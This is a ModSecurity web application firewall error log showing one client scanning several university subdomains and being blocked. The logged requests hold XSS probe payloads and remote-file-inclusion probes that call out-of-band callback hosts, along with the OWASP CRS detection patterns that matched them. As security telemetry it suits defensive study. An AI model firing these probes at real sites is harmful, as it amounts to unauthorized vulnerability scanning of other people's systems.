[Tue Aug 29 11:52:05.546889 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dcCo-f0AAAlUlo4AAAA0"]
[Tue Aug 29 11:52:05.618409 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAfWOKoAAAAL"]
[Tue Aug 29 11:52:05.618549 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnd3D4AAAAI"]
[Tue Aug 29 11:52:05.622871 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0turiqdtch3ugd.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0turiqdtch3ugd.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dcCo-f0AAAm@52oAAAAH"]
[Tue Aug 29 11:52:05.640763 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnd3D8AAAAI"]
[Tue Aug 29 11:52:05.642088 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnn2AgAAAAe"]
[Tue Aug 29 11:52:06.552832 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAn959wAAAAD"]
[Tue Aug 29 11:52:06.553373 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAnoOo0AAAAf"]
[Tue Aug 29 11:52:06.557473 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAfWOKwAAAAL"]
[Tue Aug 29 11:52:06.559379 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAn0GaYAAAAa"]
[Tue Aug 29 11:52:06.571768 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAoAkuQAAAAC"]
[Tue Aug 29 11:52:06.581270 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dsCo-f0AAAnd3EEAAAAI"]
[Tue Aug 29 11:52:06.612364 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAm7nFoAAAAE"]
[Tue Aug 29 11:52:06.632361 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAlUlpIAAAA0"]
[Tue Aug 29 11:52:06.632795 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnTlLQAAAAA"]
[Tue Aug 29 11:52:06.633721 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnoOpAAAAAf"]
[Tue Aug 29 11:52:06.643723 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAn40y0AAAAW"]
[Tue Aug 29 11:52:07.568343 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15d8Co-f0AAAoAkuYAAAAC"]
[Tue Aug 29 11:52:07.686107 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15d8Co-f0AAAni@@cAAAAU"]
[Tue Aug 29 11:52:08.535627 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAoCWEEAAAAB"]
[Tue Aug 29 11:52:08.562990 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAoCWEIAAAAB"]
[Tue Aug 29 11:52:08.567346 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn40zEAAAAW"]
[Tue Aug 29 11:52:08.595081 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAnd3EkAAAAI"]
[Tue Aug 29 11:52:08.616151 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAn0Ga8AAAAa"]
[Tue Aug 29 11:52:08.669082 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn40zMAAAAW"]
[Tue Aug 29 11:52:08.669442 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAhoHUEAAAAl"]
[Tue Aug 29 11:52:08.685348 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAnd3E0AAAAI"]
[Tue Aug 29 11:52:08.688620 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn40zQAAAAW"]
[Tue Aug 29 11:52:08.696090 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAoCWEcAAAAB"]
